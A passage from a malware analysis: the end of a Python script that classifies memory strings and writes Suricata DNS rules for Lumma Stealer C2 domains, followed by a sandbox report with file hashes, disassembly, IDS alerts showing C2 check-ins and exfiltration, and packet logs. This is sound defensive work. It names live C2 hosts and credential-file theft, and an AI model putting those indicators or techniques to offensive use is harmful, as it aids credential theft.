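    return counts, credential_fragments


def suricata_dns_rules(domains, base_sid=1000000):
    """One DNS-query rule per C2 domain; 'endswith' also catches subdomains."""
    rules = []
    for i, domain in enumerate(sorted(domains)):
        rules.append(
            f'alert dns $HOME_NET any -> any any (msg:"LummaC C2 DNS query {domain}"; '
            f'dns.query; content:"{domain}"; nocase; endswith; '
            f'sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    c2_urls, noise_urls = classify(MEMORY_URLS)
    counts, fragments = endpoint_summary(c2_urls)
    print(f"{len(c2_urls)} C2 strings, {len(noise_urls)} noise strings")
    for endpoint, n in counts.most_common():
        print(f"  {n:>2}  {endpoint}")
    for fragment in fragments:
        print(f"  credential-file fragment after /api: {fragment!r}")
    print("\n".join(suricata_dns_rules(C2_DOMAINS)))
```

Run as-is it reports six C2 strings against four noise strings, folds four of the discokeyus.lat variants onto https://discokeyus.lat/api, and surfaces "v6zchhhv.default-release/key4.dbPK" as the fragment carved next to the C2 URL; key4.db is the Firefox key database, and a profile path sitting beside the C2 endpoint in memory is the kind of detail worth checking against the file-access events in the full report rather than taking on its own. The DNS rules are deliberately per-domain rather than a single ".lat" rule, since the TLD alone would generate false positives.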
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1578981
                                                                                                                        Start date and time:2024-12-20 17:23:23 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 5m 31s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:0WO49yZcDA.exe
                                                                                                                        renamed because original name is a hash value
                                                                                                                        Original Sample Name:91e4f1ab8170b4af79ec38f14533f6c4.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                                                        EGA Information:Failed
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        • Number of executed functions: 0
                                                                                                                        • Number of non-executed functions: 4
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Stop behavior analysis, all processes terminated
                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.126.53.14, 172.202.163.200
                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 0WO49yZcDA.exe, PID 1732 because there are no executed functions
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: 0WO49yZcDA.exe
Analysis events (Time | Type | Description):
11:24:41 | API Interceptor | 10x Sleep call for process: 0WO49yZcDA.exe modified
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        104.21.21.99uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                          u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                            NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                              1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discokeyus.lat | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 104.21.21.99
discokeyus.lat | u1z7S3hr06.exe | malicious | LummaC, Stealc | 104.21.21.99
discokeyus.lat | zhQFKte2vX.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | ddySsHnC6l.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | NAliwxUTJ4.exe | malicious | LummaC | 104.21.21.99
discokeyus.lat | XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 172.67.197.170
discokeyus.lat | Z8oTIWCyDE.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | 1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
discokeyus.lat | BB4S2ErvqK.exe | malicious | LummaC | 172.67.197.170
discokeyus.lat | rEK6Z2DVp8.exe | malicious | LummaC | 172.67.197.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 104.21.21.99
CLOUDFLARENETUS | u1z7S3hr06.exe | malicious | LummaC, Stealc | 104.21.21.99
CLOUDFLARENETUS | zhQFKte2vX.exe | malicious | LummaC | 172.67.197.170
CLOUDFLARENETUS | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | ddySsHnC6l.exe | malicious | LummaC | 172.67.197.170
CLOUDFLARENETUS | NAliwxUTJ4.exe | malicious | LummaC | 104.21.21.99
CLOUDFLARENETUS | XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 172.67.197.170
CLOUDFLARENETUS | Z8oTIWCyDE.exe | malicious | LummaC | 172.67.197.170
CLOUDFLARENETUS | 1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
CLOUDFLARENETUS | http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3Ha | malicious | Unknown | 104.18.42.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | u1z7S3hr06.exe | malicious | LummaC, Stealc | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | zhQFKte2vX.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | ddySsHnC6l.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | NAliwxUTJ4.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | Z8oTIWCyDE.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | 1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | BB4S2ErvqK.exe | malicious | LummaC | 104.21.21.99
a0e9f5d64349fb13191bc781f81f42e1 | rEK6Z2DVp8.exe | malicious | LummaC | 104.21.21.99
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94821066835375
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 0WO49yZcDA.exe
File size: 1'870'848 bytes
MD5: 91e4f1ab8170b4af79ec38f14533f6c4
SHA1: 1b34ee9ec2d2bb2f861a30f7adc6c878e27511ec
SHA256: bb5655c486554fcceffdd7df4042befb5e22f3226713f4987292203773c984d0
SHA512: e3938ad828ef36edb936e7987d51600dd6220ed27395d090a265d73dd98d5e75ebcf85e63ca7127624f46e6262162350ce9d67e99a2e60a9627ed99633ece3c9
SSDEEP: 24576:JnCGpfcaWhSNkJNmDSxcqO5few3DGJHfpPMGS66AjU0QruzpAEbrVKTxyioOJLW+:JCfaWhCkJNmpWoDuHBx4AdQqdbrEoWn
TLSH: 838533131F017A47EF2955B820DBE33584F863898B3E3554A52B9D2E2CB930ACD7D16E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@..........................0J.....s.....@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a0000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F65CCC915AAh
punpckhdq mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F65CCC935A5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x51000 | 0x24800 | 6a23a69cc931f9c1603ee9e45e3a5f53 | False | 0.9974047517123288 | data | 7.977841389176462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x54000 | 0x2aa000 | 0x200 | 52bec2648188e2b10eaaa383b24b412a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
isktfjdo | 0x2fe000 | 0x1a1000 | 0x1a0600 | 90f6790f393d4507b4d15fde9e32d535 | False | 0.9946853422395677 | data | 7.954008306742392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rvricfai | 0x49f000 | 0x1000 | 0x600 | 4bd4e6440ab61a61bbc820620db128b1 | False | 0.5872395833333334 | data | 5.024395069592203 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a0000 | 0x3000 | 0x2200 | 3695dcee0fd4111c2b79410b04d3b91d | False | 0.06502757352941177 | DOS executable (COM) | 0.6698012633534087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T17:24:42.007547+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.5 | 62912 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:42.151073+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.5 | 57795 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:42.292481+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.5 | 54618 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:43.662669+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:43.662669+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:44.423127+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:44.423127+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:45.850636+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:45.850636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:46.842774+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:46.842774+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:48.675771+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49724 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:48.675771+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49724 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:51.065025+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49727 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:51.065025+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49727 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:53.773140+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49728 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:53.773140+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49728 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:56.161439+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:56.161439+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:57.205488+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:58.990580+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:58.990580+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-20T17:25:02.023218+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.5 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T17:25:02.023218+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49734 | 104.21.21.99 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                            Dec 20, 2024 17:24:51.312654018 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:51.312697887 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:51.355331898 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196425915 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196541071 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.196728945 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.196814060 CET49727443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.196826935 CET44349727104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.557282925 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557310104 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:52.557408094 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557723999 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:52.557734966 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.772991896 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.773139954 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.774579048 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.774591923 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.774837017 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.779197931 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779316902 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779354095 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:53.779426098 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:53.779437065 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750282049 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750416040 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.750514984 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.750711918 CET49728443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.750735044 CET44349728104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.941735983 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.941772938 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:54.941879034 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.942203045 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:54.942214966 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.161359072 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.161438942 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.162674904 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.162683010 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.162882090 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:56.167085886 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.167166948 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:56.167171955 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205482006 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205598116 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.205656052 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.205857038 CET49731443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.205881119 CET44349731104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.770459890 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770498991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:57.770705938 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770939112 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:57.770953894 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.990479946 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.990580082 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.991801023 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.991820097 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.992084980 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.993262053 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.993994951 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994036913 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.994132996 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994163036 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.994869947 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.994909048 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995024920 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995059013 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995189905 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995222092 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995359898 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995393991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995403051 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995417118 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995534897 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995557070 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:58.995588064 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995690107 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:58.995716095 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043332100 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043502092 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043548107 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043556929 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043570042 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043587923 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043598890 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:24:59.043605089 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:24:59.043607950 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.341968060 CET44349732104.21.21.99192.168.2.5
